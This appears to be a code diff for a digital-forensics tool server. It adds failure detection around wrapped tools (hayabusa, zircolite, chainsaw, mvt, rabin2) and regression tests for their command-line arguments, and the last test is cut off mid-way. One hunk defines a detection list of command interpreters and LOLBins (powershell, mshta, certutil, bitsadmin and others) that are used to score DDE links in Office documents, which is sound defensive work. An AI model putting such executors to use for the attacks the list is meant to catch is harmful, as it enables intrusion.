+    for link in dde_links:
+        index_parts.append(f"DDE {link.get('field_type', 'DDE')}: {link.get('command', '')}")
     index_text = "\n".join(index_parts)
 
     summary = extract_and_index(index_text, "office.analysis", file_path, "oletools")
@@ -724,6 +793,12 @@ def analyze_office_document(
     summary["macros"] = macros
     summary["indicators"] = indicators
     summary["dde_links"] = dde_links
+    # Without this an agent cannot tell "no DDE links in this document" from
+    # "DDE analysis did not run", which is the false negative the code above
+    # already says must not happen.
+    summary["dde_analyzed"] = analyze_dde and not dde_warning
+    if dde_warning:
+        summary["warning"] = dde_warning
     summary["risk_assessment"] = risk
     summary["macro_count"] = len(macros)
     summary["has_vba"] = has_vba

--- a/src/mulder/server/tools/documents.py
+++ b/src/mulder/server/tools/documents.py
@@ -332,6 +332,24 @@ def _analyze_macros_olevba(
     return macros, indicators, has_vba
 
 
+_DDE_EXECUTORS: frozenset[str] = frozenset(
+    {
+        "cmd.exe",
+        "powershell",
+        "mshta",
+        "regsvr32",
+        "rundll32",
+        "wscript",
+        "cscript",
+        "certutil",
+        "bitsadmin",
+        "msiexec",
+        "curl",
+    }
+)
+"""Command interpreters and LOLBins a DDE link is used to reach."""
+
+
 def _assess_office_risk(
     macros: list[dict[str, object]],
     has_vba: bool,
@@ -356,6 +374,9 @@ def _assess_office_risk(
     links = list(dde_links or [])
     auto_exec = any(m.get("is_auto_exec") for m in macros)
     dde_auto = any("DDEAUTO" in str(link.get("field_type", "")).upper() for link in links)
+    dde_executor = any(
+        exe in str(link.get("command", "")).lower() for link in links for exe in _DDE_EXECUTORS
+    )
 
     has_suspicious = any(m.get("suspicious_keywords") for m in macros)
 
@@ -388,12 +409,16 @@ def _assess_office_risk(
         reasons.append(
             f"{len(links)} DDE link(s) present"
             + (" including an auto-executing one" if dde_auto else "")
+            + (" invoking a command interpreter" if dde_executor else "")
         )
 
     if links:
         # A DDE link executes a command when the document is opened (DDEAUTO)
         # or when the user accepts one prompt. Either way this is not clean.
-        risk_level = "malicious" if dde_auto else "high"
+        # "malicious" is reserved for the combination the VBA path also
+        # reserves it for -- an automatic trigger meeting an executor -- since
+        # a DDEAUTO pointing at another spreadsheet is legitimate, if rare.
+        risk_level = "malicious" if (dde_auto and dde_executor) else "high"
     elif not has_vba:
         risk_level = "clean"
     elif auto_exec and (has_execute or has_download):

--- a/src/mulder/server/tools/email.py
+++ b/src/mulder/server/tools/email.py
@@ -14,6 +14,7 @@ from mulder.server.app import mcp
 from mulder.server.extract_helpers import extract_and_index
 from mulder.server.helpers import (
     adaptive_timeout,
+    classify_tool_exit,
     error_response,
     make_tool_call_id,
     require_binary,
@@ -345,7 +346,7 @@ def parse_pst(
 
         pst_timeout = adaptive_timeout(file_path, base=_READPST_TIMEOUT)
         try:
-            subprocess.run(
+            proc = subprocess.run(
                 cmd,
                 capture_output=True,
                 text=True,
@@ -368,6 +369,21 @@ def parse_pst(
                 params,
                 f"Failed to execute readpst: {exc}",
                 (time.monotonic() - t0) * 1000,
+            )
+
+        verdict, message = classify_tool_exit(
+            proc,
+            "readpst",
+            produced_output=any(output_dir.rglob("*.eml")),
+        )
+        if verdict == "failed":
+            return error_response(
+                tc_id,
+                "parse_pst",
+                params,
+                message,
+                (time.monotonic() - t0) * 1000,
+                error_type="tool_failed",
             )
 
         result = _parse_extracted_emails(
@@ -394,4 +410,7 @@ def parse_pst(
     summary.update(result)
 
     elapsed = (time.monotonic() - t0) * 1000
-    return tool_response(tc_id, "parse_pst", params, summary, "pst.emails", elapsed)
+    response = tool_response(tc_id, "parse_pst", params, summary, "pst.emails", elapsed)
+    if verdict == "partial":
+        response["warning"] = message
+    return response

--- a/src/mulder/server/tools/extract/carving.py
+++ b/src/mulder/server/tools/extract/carving.py
@@ -18,6 +18,7 @@ from mulder.server.helpers import (
     _FILE_LIST_CAP,
     _PREVIEW_CHAR_LIMIT,
     adaptive_timeout,
+    classify_tool_exit,
     error_response,
     make_tool_call_id,
     require_binary,
@@ -639,7 +640,7 @@ def run_photorec(image_path: str) -> dict[str, object]:
             f"search,{tmpdir}/",
         ]
         try:
-            subprocess.run(
+            proc = subprocess.run(
                 cmd,
                 capture_output=True,
                 text=True,
@@ -656,6 +657,20 @@ def run_photorec(image_path: str) -> dict[str, object]:
             )
 
         report_path = Path(tmpdir) / "report.xml"
+        recovered_anything = report_path.exists() or any(
+            f.is_file() for f in Path(tmpdir).rglob("*")
+        )
+        verdict, message = classify_tool_exit(proc, "photorec", produced_output=recovered_anything)
+        if verdict == "failed":
+            return error_response(
+                tc_id,
+                "run_photorec",
+                params,
+                message,
+                elapsed_ms=(time.monotonic() - t0) * 1000,
+                error_type="tool_failed",
+            )
+
         report_text = ""
         if report_path.exists():
             report_text = report_path.read_text(errors="replace")

--- a/src/mulder/server/tools/hayabusa.py
+++ b/src/mulder/server/tools/hayabusa.py
@@ -257,8 +257,8 @@ def run_hayabusa(
     if severity not in _VALID_SEVERITIES:
         severity = "medium"
 
-    with tempfile.NamedTemporaryFile(suffix=".csv", delete=False) as tmp:
-        out_path = tmp.name
+    tmp_dir = tempfile.mkdtemp(prefix="mulder_hayabusa_")
+    out_path = str(Path(tmp_dir) / "timeline.csv")
 
     cmd = [
         hayabusa_bin,
@@ -267,6 +267,7 @@ def run_hayabusa(
         resolved_dir,
         "-o",
         out_path,
+        "--clobber",
         "-p",
         "super-verbose",
         "--no-wizard",
@@ -293,7 +294,7 @@ def run_hayabusa(
                 elapsed_ms=(time.monotonic() - t0) * 1000,
             )
 
-        if proc.returncode != 0 and not Path(out_path).exists():
+        if proc.returncode != 0:
             stderr_preview = (proc.stderr or "")[:_PREVIEW_CHAR_LIMIT]
             return error_response(
                 tc_id,
@@ -303,12 +304,24 @@ def run_hayabusa(
                 elapsed_ms=(time.monotonic() - t0) * 1000,
             )
 
+        if not Path(out_path).exists():
+            # Hayabusa reports several fatal conditions on stdout and still
+            # exits 0; a missing output file is the only reliable signal.
+            preview = ((proc.stderr or "") + (proc.stdout or ""))[-_PREVIEW_CHAR_LIMIT:]
+            return error_response(
+                tc_id,
+                tool_name,
+                params,
+                f"Hayabusa produced no output file: {preview}",
+                elapsed_ms=(time.monotonic() - t0) * 1000,
+            )
+
         try:
             csv_text = Path(out_path).read_text(errors="replace")
         except OSError:
             csv_text = ""
     finally:
-        Path(out_path).unlink(missing_ok=True)
+        shutil.rmtree(tmp_dir, ignore_errors=True)
 
     if not csv_text.strip():
         elapsed = (time.monotonic() - t0) * 1000

--- a/src/mulder/server/tools/mvt.py
+++ b/src/mulder/server/tools/mvt.py
@@ -19,7 +19,12 @@ from pathlib import Path
 
 from mulder.server.app import mcp
 from mulder.server.extract_helpers import extract_and_index
-from mulder.server.helpers import error_response, make_tool_call_id, tool_response
+from mulder.server.helpers import (
+    classify_tool_exit,
+    error_response,
+    make_tool_call_id,
+    tool_response,
+)
 from mulder.server.tool_access import Role, tool_access
 
 logger = logging.getLogger(__name__)
@@ -123,6 +128,19 @@ def run_mvt_android(
 
         raw_output, module_counts = _collect_mvt_results(tmpdir)
 
+        verdict, message = classify_tool_exit(
+            proc, cmd[0], produced_output=bool(raw_output.strip())
+        )
+        if verdict == "failed":
+            return error_response(
+                tc_id,
+                tool_name,
+                params,
+                message,
+                elapsed_ms=(time.monotonic() - t0) * 1000,
+                error_type="tool_failed",
+            )
+
         if not raw_output.strip():
             raw_output = proc.stdout.strip() or proc.stderr.strip()
 
@@ -222,6 +240,19 @@ def run_mvt_ios(
             )
 
         raw_output, module_counts = _collect_mvt_results(tmpdir)
+
+        verdict, message = classify_tool_exit(
+            proc, cmd[0], produced_output=bool(raw_output.strip())
+        )
+        if verdict == "failed":
+            return error_response(
+                tc_id,
+                tool_name,
+                params,
+                message,
+                elapsed_ms=(time.monotonic() - t0) * 1000,
+                error_type="tool_failed",
+            )
 
         if not raw_output.strip():
             raw_output = proc.stdout.strip() or proc.stderr.strip()

--- a/src/mulder/server/tools/zircolite.py
+++ b/src/mulder/server/tools/zircolite.py
@@ -100,7 +100,6 @@ def _run_zircolite_process(
         str(events_path),
         "--ruleset",
         str(ruleset_path),
-        "--json",
         "--outfile",
         str(output_file),
         *format_flags,

--- a/src/mulder/server/tools/zircolite.py
+++ b/src/mulder/server/tools/zircolite.py
@@ -16,6 +16,7 @@ from mulder.assets.paths import asset_display_path, asset_path, asset_search_sum
 from mulder.server.app import mcp
 from mulder.server.extract_helpers import extract_and_index
 from mulder.server.helpers import (
+    classify_tool_exit,
     error_response,
     make_tool_call_id,
     sources_already_indexed,
@@ -74,7 +75,7 @@ def _run_zircolite_process(
     log_format: str,
     ruleset_path: Path,
     output_dir: Path,
-) -> Path:
+) -> tuple[Path, subprocess.CompletedProcess[str]]:
     """Execute Zircolite against event logs.
 
     Args:
@@ -85,7 +86,10 @@ def _run_zircolite_process(
         output_dir: Output directory for results.
 
     Returns:
-        Path to the JSON results file.
+        ``(results_path, completed_process)``. The caller must inspect the
+        process: Zircolite exits non-zero on a bad argument or ruleset and
+        writes no output file, which the parser would otherwise report as
+        zero detections.
 
     Raises:
         subprocess.TimeoutExpired: If Zircolite exceeds the timeout.
@@ -105,14 +109,14 @@ def _run_zircolite_process(
         *format_flags,
     ]
 
-    subprocess.run(
+    proc = subprocess.run(
         cmd,
         capture_output=True,
         text=True,
         timeout=_ZIRCOLITE_TIMEOUT,
         check=False,
     )
-    return output_file
+    return output_file, proc
 
 
 def _build_detection_timeline(
@@ -360,7 +364,7 @@ def run_zircolite(
     with tempfile.TemporaryDirectory(prefix="mulder_zircolite_") as tmpdir:
         output_dir = Path(tmpdir)
         try:
-            results_path = _run_zircolite_process(
+            results_path, proc = _run_zircolite_process(
                 str(script),
                 Path(events_path),
                 log_format,
@@ -384,6 +388,19 @@ def run_zircolite(
                 f"Failed to execute Zircolite: {exc}",
                 (time.monotonic() - t0) * 1000,
                 error_type="os_error",
+            )
+
+        verdict, message = classify_tool_exit(
+            proc, "zircolite", produced_output=results_path.exists()
+        )
+        if verdict == "failed":
+            return error_response(
+                tc_id,
+                "run_zircolite",
+                params,
+                message,
+                (time.monotonic() - t0) * 1000,
+                error_type="tool_failed",
             )
 
         result = _parse_zircolite_output(results_path, events_path, log_format, sigma_level_filter)

--- a/tests/test_binary_resolution.py
+++ b/tests/test_binary_resolution.py
@@ -34,6 +34,14 @@ def _completed(**kwargs: Any) -> subprocess.CompletedProcess[str]:
     return subprocess.CompletedProcess(args=[], returncode=0, stdout="", stderr="")
 
 
+def _fake_mapping(root: Path) -> Path:
+    """chainsaw hunt refuses to start without --mapping; give it a real file."""
+    mapping = root / "chainsaw_mappings" / "sigma-event-logs-all.yml"
+    mapping.parent.mkdir(parents=True, exist_ok=True)
+    mapping.write_text("")
+    return mapping
+
+
 class TestChainsaw:
     def test_execs_the_binary_the_gate_found(self, tmp_path: Path) -> None:
         from mulder.server.tools.chainsaw import run_chainsaw
@@ -41,10 +49,15 @@ class TestChainsaw:
         chainsaw = _fake_binary(tmp_path, "chainsaw")
         evidence = tmp_path / "evtx"
         evidence.mkdir()
+        mapping = _fake_mapping(tmp_path)
 
         with (
             patch("mulder.server.tools.chainsaw.sources_already_indexed", return_value=[]),
             patch("mulder.server.helpers.shutil.which", return_value=str(chainsaw)),
+            patch(
+                "mulder.server.tools.chainsaw._default_chainsaw_mapping",
+                return_value=mapping,
+            ),
             patch("mulder.server.tools.chainsaw.extract_and_index", return_value={}),
             patch(
                 "mulder.server.tools.chainsaw.subprocess.run", return_value=_completed()
@@ -76,10 +89,15 @@ class TestChainsaw:
         binary = installed / "chainsaw"
         binary.write_text("#!/bin/sh\n")
         binary.chmod(0o755)
+        mapping = _fake_mapping(asset_root)
 
         with (
             patch("mulder.server.tools.chainsaw.sources_already_indexed", return_value=[]),
             patch("mulder.server.helpers.shutil.which", return_value=None),
+            patch(
+                "mulder.server.tools.chainsaw._default_chainsaw_mapping",
+                return_value=mapping,
+            ),
             patch("mulder.server.tools.chainsaw.extract_and_index", return_value={}),
             patch(
                 "mulder.server.tools.chainsaw.subprocess.run", return_value=_completed()
@@ -104,6 +122,9 @@ class TestChainsaw:
         chainsaw.mkdir()
         (chainsaw / "chainsaw").write_text("")
         (chainsaw / "chainsaw").chmod(0o755)
+        mappings = chainsaw / "mappings"
+        mappings.mkdir()
+        (mappings / "sigma-event-logs-all.yml").write_text("")
 
         with (
             patch("mulder.server.tools.chainsaw.sources_already_indexed", return_value=[]),
@@ -115,7 +136,11 @@ class TestChainsaw:
         ):
             run_chainsaw.__wrapped__(str(asset_root))  # type: ignore[attr-defined]
 
-        assert str(rules) in mock_run.call_args[0][0]
+        argv = mock_run.call_args[0][0]
+        assert str(rules) in argv
+        # chainsaw treats --mapping as required whenever Sigma rules are given.
+        assert "--mapping" in argv
+        assert str(mappings / "sigma-event-logs-all.yml") in argv
 
 
 def _eve_stub() -> dict[str, Any]:

--- a/tests/test_binary_triage_incomplete.py
+++ b/tests/test_binary_triage_incomplete.py
@@ -1,0 +1,152 @@
+"""A binary that was never analysed came back as "benign_indicators".
+
+``triage_binary`` computes its verdict from imports, sections, the timestamp
+and section permissions. The three ``_run_rabin2`` calls that collect the
+first two were wrapped in a ``try`` that swallowed ``TimeoutExpired`` and
+``OSError`` with a log line, and ``_run_rabin2`` itself discarded the process
+return code. So a rabin2 that timed out on a large or corrupted PE -- or
+exited non-zero on an obfuscated header -- left ``imports`` and ``sections``
+empty:
+
+* ``_classify_imports([])`` returns ``{}``
+* ``_detect_packing([], [])`` returns ``[]``
+* score stays 0 → ``classification: "benign_indicators"``, ``confidence: "medium"``
+
+with ``status: success`` and nothing in the response saying the analysis had
+not happened. The sample most likely to defeat rabin2 is the sample most
+worth examining.
+
+The verdict is now ``inconclusive`` with ``confidence: "none"`` when any input
+is missing, and the response carries a warning saying which.
+"""
+
+from __future__ import annotations
+
+import subprocess
+from pathlib import Path
+from typing import Any
+from unittest.mock import patch
+
+import mulder.server.tools.binary as binary
+from mulder.server.tools.binary import _compute_verdict, _run_rabin2
+
+INFO_JSON = (
+    '{"info": {"arch": "x86", "bits": 64, "bintype": "pe", "os": "windows",'
+    ' "compiled": "Wed Mar 12 09:41:03 2025"}}'
+)
+
+
+def _completed(
+    returncode: int = 0, stdout: str = "", stderr: str = ""
+) -> subprocess.CompletedProcess[str]:
+    return subprocess.CompletedProcess(["rabin2"], returncode, stdout, stderr)
+
+
+class TestRabin2FailureIsNotAnEmptyResult:
+    def test_a_nonzero_exit_with_no_output_raises(self) -> None:
+        with (
+            patch(
+                "mulder.server.tools.binary.subprocess.run",
+                return_value=_completed(returncode=1, stderr="cannot open file"),
+            ),
+            __import__("pytest").raises(OSError, match="rabin2"),
+        ):
+            _run_rabin2("i", Path("/fake/x.exe"))
+
+    def test_a_nonzero_exit_that_produced_output_is_kept(self) -> None:
+        with patch(
+            "mulder.server.tools.binary.subprocess.run",
+            return_value=_completed(returncode=1, stdout=INFO_JSON),
+        ):
+            assert _run_rabin2("I", Path("/fake/x.exe"))["info"]["bintype"] == "pe"
+
+    def test_a_clean_run_with_no_output_is_still_empty(self) -> None:
+        """rabin2 exiting 0 with nothing to say is a legitimate empty result."""
+        with patch("mulder.server.tools.binary.subprocess.run", return_value=_completed()):
+            assert _run_rabin2("i", Path("/fake/x.exe")) == {}
+
+
+class TestTheVerdictSaysWhenItWasComputedFromNothing:
+    def test_an_incomplete_analysis_is_inconclusive(self) -> None:
+        verdict = _compute_verdict([], {}, {"validity": "valid"}, [], ["rabin2 timed out"])
+        assert verdict["classification"] == "inconclusive"
+        assert verdict["confidence"] == "none"
+
+    def test_the_reason_names_what_failed(self) -> None:
+        verdict = _compute_verdict([], {}, {"validity": "valid"}, [], ["rabin2 timed out"])
+        assert any("rabin2 timed out" in str(r) for r in verdict["reasons"])  # type: ignore[union-attr]
+
+    def test_a_complete_analysis_is_unaffected(self) -> None:
+        assert _compute_verdict([], {}, {"validity": "valid"}, [], []) == _compute_verdict(
+            [], {}, {"validity": "valid"}, []
+        )
+
+    def test_findings_are_not_hidden_by_the_incomplete_flag(self) -> None:
+        """A partial run that still found something must keep the reasons."""
+        verdict = _compute_verdict(
+            ["upx section names"], {}, {"validity": "valid"}, [], ["rahash2 failed"]
+        )
+        assert verdict["classification"] == "inconclusive"
+        assert any("packing indicator" in str(r) for r in verdict["reasons"])  # type: ignore[union-attr]
+
+
+class TestTriageBinaryEndToEnd:
+    @staticmethod
+    def _run(tmp_path: Path, standard_effect: object) -> dict[str, Any]:
+        target = tmp_path / "sample.exe"
+        target.write_bytes(b"MZ" + b"\x00" * 64)
+        captured: dict[str, Any] = {}
+
+        calls: list[str] = []
+
+        def fake_run(cmd: list[str], **kwargs: object) -> subprocess.CompletedProcess[str]:
+            flag = cmd[1] if len(cmd) > 1 else ""
+            calls.append(flag)
+            if flag == "-Ij":
+                return _completed(stdout=INFO_JSON)
+            if isinstance(standard_effect, BaseException):
+                raise standard_effect
+            return _completed(stdout="{}")
+
+        def capture_response(
+            tc_id: str, tool_name: str, params: object, results: object, *a: object
+        ) -> dict[str, object]:
+            if isinstance(results, dict):
+                captured.update(results)
+            return {"status": "success"}
+
+        with (
+            patch("mulder.server.tools.binary.subprocess.run", side_effect=fake_run),
+            patch.object(binary, "require_binary", return_value="/usr/bin/rabin2"),
+            patch.object(binary, "extract_and_index", return_value={}),
+            patch.object(binary, "tool_response", capture_response),
+        ):
+            binary.triage_binary.__wrapped__(  # type: ignore[attr-defined]
+                "case-1", str(target), depth="standard"
+            )
+        return captured
+
+    def test_a_timeout_does_not_produce_a_benign_verdict(self, tmp_path: Path) -> None:
+        summary = self._run(tmp_path, subprocess.TimeoutExpired(cmd=["rabin2"], timeout=60))
+        verdict = summary["triage_verdict"]
+        assert verdict["classification"] == "inconclusive"
+        assert verdict["confidence"] == "none"
+
+    def test_the_response_says_the_analysis_was_incomplete(self, tmp_path: Path) -> None:
+        summary = self._run(tmp_path, subprocess.TimeoutExpired(cmd=["rabin2"], timeout=60))
+        assert summary["analysis_complete"] is False
+        assert "not evidence of a clean binary" in str(summary["warning"])
+
+    def test_a_successful_triage_is_marked_complete(self, tmp_path: Path) -> None:
+        """A run that collected its evidence still returns a real verdict.
+
+        Which verdict depends on how the ctime-formatted `compiled` value in
+        the fixture is scored, which is a separate defect fixed in its own
+        change; what matters here is that a complete run is not suppressed.
+        """
+        summary = self._run(tmp_path, None)
+        assert summary["analysis_complete"] is True
+        assert "warning" not in summary
+        verdict = summary["triage_verdict"]
+        assert verdict["classification"] != "inconclusive"
+        assert verdict["confidence"] != "none"

--- a/tests/test_cli_contracts.py
+++ b/tests/test_cli_contracts.py
@@ -1,0 +1,205 @@
+"""Regression tests for the argv mulder hands to each wrapped forensic tool.
+
+Every assertion below was checked against the pinned release of the tool
+(``src/mulder/assets/manifest.py``) by running the real binary:
+
+* ``chainsaw 2.16.0`` -- ``hunt -s <rules>`` without ``--mapping`` exits 2
+  ("the following required arguments were not provided: --mapping");
+  ``analyse srum`` requires ``--software`` and has no ``--json``;
+  ``dump`` has no ``--from`` / ``--to``.
+* ``hayabusa 3.8.1`` -- ``csv-timeline -o <existing file>`` refuses to run
+  **and exits 0**, so only ``--clobber`` (or an absent path) makes it work.
+* ``capa 9.4.0`` / ``floss 3.1.0`` -- ``--format`` selects the *sample*
+  format; ``--format json`` is an invalid choice and both exit 2.
+* ``Zircolite 2.20.0`` -- has no ``--json`` flag at all; JSON is the default.
+"""
+
+from __future__ import annotations
+
+import subprocess
+from pathlib import Path
+from typing import Any
+from unittest.mock import patch
+
+import pytest
+
+
+def _completed(stdout: str = "", returncode: int = 0) -> subprocess.CompletedProcess[str]:
+    return subprocess.CompletedProcess(args=[], returncode=returncode, stdout=stdout, stderr="")
+
+
+class TestZircoliteArgv:
+    def test_no_json_flag(self, tmp_path: Path) -> None:
+        from mulder.server.tools.zircolite import _run_zircolite_process
+
+        with patch(
+            "mulder.server.tools.zircolite.subprocess.run", return_value=_completed()
+        ) as run:
+            _run_zircolite_process(
+                "zircolite.py", tmp_path, "evtx", tmp_path / "rules.json", tmp_path
+            )
+
+        argv = run.call_args[0][0]
+        assert "--json" not in argv, "Zircolite 2.20.0 has no --json flag; argparse exits 2"
+        assert "--events" in argv
+        assert "--ruleset" in argv
+        assert "--outfile" in argv
+
+
+class TestCapaFlossArgv:
+    def test_capa_uses_json_not_format_json(self) -> None:
+        source = Path("src/mulder/server/tools/binary.py").read_text()
+        assert '[capa_bin, "--json", "--quiet"]' in source
+        assert '"--format",\n        "json"' not in source
+
+    def test_floss_excludes_static_with_no_static(self) -> None:
+        source = Path("src/mulder/server/tools/binary.py").read_text()
+        # A bare `--only` is nargs="+" and swallowed the sample path.
+        assert 'cmd.extend(["--no", "static"])' in source
+        assert 'cmd.append("--only")' not in source
+
+
+class TestChainsawArgv:
+    @staticmethod
+    def _run(tmp_path: Path, **kwargs: Any) -> tuple[dict[str, object], list[str] | None]:
+        from mulder.server.tools.chainsaw import run_chainsaw
+
+        binary = tmp_path / "chainsaw"
+        binary.write_text("#!/bin/sh\n")
+        binary.chmod(0o755)
+        mapping = tmp_path / "mappings" / "sigma-event-logs-all.yml"
+        mapping.parent.mkdir(parents=True, exist_ok=True)
+        mapping.write_text("")
+        evidence = tmp_path / "evtx"
+        evidence.mkdir(exist_ok=True)
+
+        with (
+            patch("mulder.server.tools.chainsaw.sources_already_indexed", return_value=[]),
+            patch("mulder.server.helpers.shutil.which", return_value=str(binary)),
+            patch("mulder.server.tools.chainsaw._default_chainsaw_mapping", return_value=mapping),
+            patch("mulder.server.tools.chainsaw.extract_and_index", return_value={}),
+            patch("mulder.server.tools.chainsaw.subprocess.run", return_value=_completed()) as run,
+        ):
+            result = run_chainsaw.__wrapped__(  # type: ignore[attr-defined]
+                str(evidence), **kwargs
+            )
+        argv = list(run.call_args[0][0]) if run.call_args else None
+        return result, argv
+
+    def test_hunt_passes_mapping(self, tmp_path: Path) -> None:
+        _, argv = self._run(tmp_path, mode="hunt")
+        assert argv is not None
+        assert "--mapping" in argv
+
+    def test_hunt_errors_when_mapping_asset_is_absent(self, tmp_path: Path) -> None:
+        from mulder.server.tools.chainsaw import run_chainsaw
+
+        binary = tmp_path / "chainsaw"
+        binary.write_text("#!/bin/sh\n")
+        binary.chmod(0o755)
+        evidence = tmp_path / "evtx"
+        evidence.mkdir()
+
+        with (
+            patch("mulder.server.tools.chainsaw.sources_already_indexed", return_value=[]),
+            patch("mulder.server.helpers.shutil.which", return_value=str(binary)),
+            patch(
+                "mulder.server.tools.chainsaw._default_chainsaw_mapping",
+                return_value=tmp_path / "nope.yml",
+            ),
+        ):
+            result = run_chainsaw.__wrapped__(str(evidence))  # type: ignore[attr-defined]
+
+        assert result["error_type"] == "asset_missing"
+
+    def test_srum_requires_software_hive(self, tmp_path: Path) -> None:
+        result, argv = self._run(tmp_path, mode="srum")
+        assert result["error_type"] == "invalid_argument"
+        assert "software_hive" in str(result["error_message"])
+        assert argv is None, "chainsaw must not be executed without --software"
+
+    def test_srum_passes_software_and_no_json(self, tmp_path: Path) -> None:
+        hive = tmp_path / "SOFTWARE"
+        hive.write_bytes(b"regf")
+        _, argv = self._run(tmp_path, mode="srum", software_hive=str(hive))
+        assert argv is not None
+        assert "--software" in argv
+        assert str(hive) in argv
+        assert "--json" not in argv, "chainsaw analyse srum has no --json flag"
+
+    def test_timeline_rejects_a_time_range(self, tmp_path: Path) -> None:
+        result, argv = self._run(tmp_path, mode="timeline", time_range_start="2024-01-01T00:00:00")
+        assert result["error_type"] == "invalid_argument"
+        assert argv is None
+
+    def test_timeline_without_a_range_passes_no_from_to(self, tmp_path: Path) -> None:
+        _, argv = self._run(tmp_path, mode="timeline")
+        assert argv is not None
+        assert "--from" not in argv
+        assert "--to" not in argv
+
+
+class TestHayabusaArgv:
+    def test_clobber_is_passed_and_output_path_is_fresh(self, tmp_path: Path) -> None:
+        from mulder.server.tools import hayabusa as hb
+
+        evtx_dir = tmp_path / "evtx"
+        evtx_dir.mkdir()
+        (evtx_dir / "a.evtx").write_bytes(b"ElfFile\x00")
+        binary = tmp_path / "hayabusa"
+        binary.write_text("#!/bin/sh\n")
+        binary.chmod(0o755)
+
+        seen: dict[str, Any] = {}
+
+        def fake_run(cmd: list[str], **kwargs: Any) -> subprocess.CompletedProcess[str]:
+            seen["argv"] = cmd
+            out = Path(cmd[cmd.index("-o") + 1])
+            seen["existed_before"] = out.exists()
+            out.write_text("Timestamp,RuleTitle\n")
+            return _completed()
+
+        with (
+            patch.object(hb, "_hayabusa_binary", return_value=str(binary)),
+            patch.object(hb, "_resolve_evtx_dir", return_value=str(evtx_dir)),
+            patch.object(hb, "sources_already_indexed", return_value=[]),
+            patch.object(hb, "extract_and_index", return_value={}),
+            patch.object(hb.subprocess, "run", side_effect=fake_run),
+        ):
+            hb.run_hayabusa.__wrapped__(str(evtx_dir))  # type: ignore[attr-defined]
+
+        assert "--clobber" in seen["argv"]
+        assert seen["existed_before"] is False, (
+            "hayabusa refuses to overwrite an existing -o path and exits 0 while doing so"
+        )
+
+    def test_missing_output_file_is_an_error_not_zero_alerts(self, tmp_path: Path) -> None:
+        from mulder.server.tools import hayabusa as hb
+
+        evtx_dir = tmp_path / "evtx"
+        evtx_dir.mkdir()
+        (evtx_dir / "a.evtx").write_bytes(b"ElfFile\x00")
+        binary = tmp_path / "hayabusa"
+        binary.write_text("#!/bin/sh\n")
+        binary.chmod(0o755)
+
+        # The real refusal: exit 0, nothing written.
+        with (
+            patch.object(hb, "_hayabusa_binary", return_value=str(binary)),
+            patch.object(hb, "_resolve_evtx_dir", return_value=str(evtx_dir)),
+            patch.object(hb, "sources_already_indexed", return_value=[]),
+            patch.object(hb, "extract_and_index", return_value={}),
+            patch.object(
+                hb.subprocess,
+                "run",
+                return_value=_completed(stdout="[ERROR] The file already exists."),
+            ),
+        ):
+            result = hb.run_hayabusa.__wrapped__(str(evtx_dir))  # type: ignore[attr-defined]
+
+        assert result["status"] == "error"
+        assert result.get("total_alerts") != 0
+
+
+if __name__ == "__main__":  # pragma: no cover
+    raise SystemExit(pytest.main([__file__]))

--- a/tests/test_cli_contracts.py
+++ b/tests/test_cli_contracts.py
@@ -16,6 +16,7 @@ Every assertion below was checked against the pinned release of the tool
 
 from __future__ import annotations
 
+import argparse
 import subprocess
 from pathlib import Path
 from typing import Any
@@ -46,17 +47,104 @@ class TestZircoliteArgv:
         assert "--outfile" in argv
 
 
-class TestCapaFlossArgv:
-    def test_capa_uses_json_not_format_json(self) -> None:
-        source = Path("src/mulder/server/tools/binary.py").read_text()
-        assert '[capa_bin, "--json", "--quiet"]' in source
-        assert '"--format",\n        "json"' not in source
+def _floss_parser() -> argparse.ArgumentParser:
+    """floss 3.1.0's parser, for the options mulder passes.
 
-    def test_floss_excludes_static_with_no_static(self) -> None:
-        source = Path("src/mulder/server/tools/binary.py").read_text()
-        # A bare `--only` is nargs="+" and swallowed the sample path.
-        assert 'cmd.extend(["--no", "static"])' in source
-        assert 'cmd.append("--only")' not in source
+    Mirrors floss/main.py v3.1.0: `-n/--minimum-length`, a positional
+    `sample`, `--no`/`--only` as ``action="extend", nargs="+"`` over
+    ``{static,stack,tight,decoded}``, `-f/--format` over
+    ``{auto,pe,sc32,sc64}`` and `-j/--json`. Parsing mulder's argv with it
+    is what catches a flag rename that argparse would still reject.
+    """
+
+    class _Extend(argparse.Action):
+        def __call__(  # type: ignore[override]
+            self,
+            parser: argparse.ArgumentParser,
+            namespace: argparse.Namespace,
+            values: Any,
+            option_string: str | None = None,
+        ) -> None:
+            items = list(getattr(namespace, self.dest, None) or [])
+            items.extend(values)
+            setattr(namespace, self.dest, items)
+
+    types = ["static", "stack", "tight", "decoded"]
+    parser = argparse.ArgumentParser(prog="floss", add_help=False)
+    parser.register("action", "extend", _Extend)
+    parser.add_argument("-n", "--minimum-length", dest="min_length", type=int, default=4)
+    parser.add_argument("sample")
+    parser.add_argument(
+        "--no", action="extend", dest="disabled_types", nargs="+", choices=types, default=[]
+    )
+    parser.add_argument(
+        "--only", action="extend", dest="enabled_types", nargs="+", choices=types, default=[]
+    )
+    parser.add_argument("-f", "--format", choices=["auto", "pe", "sc32", "sc64"], default="auto")
+    parser.add_argument("-j", "--json", action="store_true")
+    return parser
+
+
+def _capa_parser() -> argparse.ArgumentParser:
+    """capa 9.4.0's parser, for the options mulder passes."""
+    parser = argparse.ArgumentParser(prog="capa", add_help=False)
+    parser.add_argument("-q", "--quiet", action="store_true")
+    parser.add_argument("-j", "--json", action="store_true")
+    parser.add_argument(
+        "-f",
+        "--format",
+        choices=["auto", "pe", "dotnet", "elf", "sc32", "sc64", "cape", "freeze"],
+        default="auto",
+    )
+    parser.add_argument("-r", "--rules", action="append", default=[])
+    parser.add_argument("sample")
+    return parser
+
+
+class TestCapaFlossArgv:
+    """Parse mulder's argv with each tool's own parser, not with a substring."""
+
+    @staticmethod
+    def _argv(tool: str, tmp_path: Path, **kwargs: Any) -> list[str]:
+        from mulder.server.tools import binary as b
+
+        sample = tmp_path / "sample.bin"
+        sample.write_bytes(b"MZ\x90\x00")
+        fake = tmp_path / tool
+        fake.write_text("#!/bin/sh\n")
+        fake.chmod(0o755)
+
+        with (
+            patch.object(b, "require_binary", return_value=str(fake)),
+            patch.object(b, "extract_and_index", return_value={}),
+            patch.object(b.subprocess, "run", return_value=_completed(stdout="{}")) as run,
+        ):
+            fn = b.run_capa if tool == "capa" else b.run_floss
+            fn.__wrapped__("case", str(sample), **kwargs)  # type: ignore[attr-defined]
+        return list(run.call_args[0][0])
+
+    def test_capa_argv_parses(self, tmp_path: Path) -> None:
+        argv = self._argv("capa", tmp_path)
+        # capa's --format takes a *sample* format; "--format json" exits 2.
+        assert "--format" not in argv
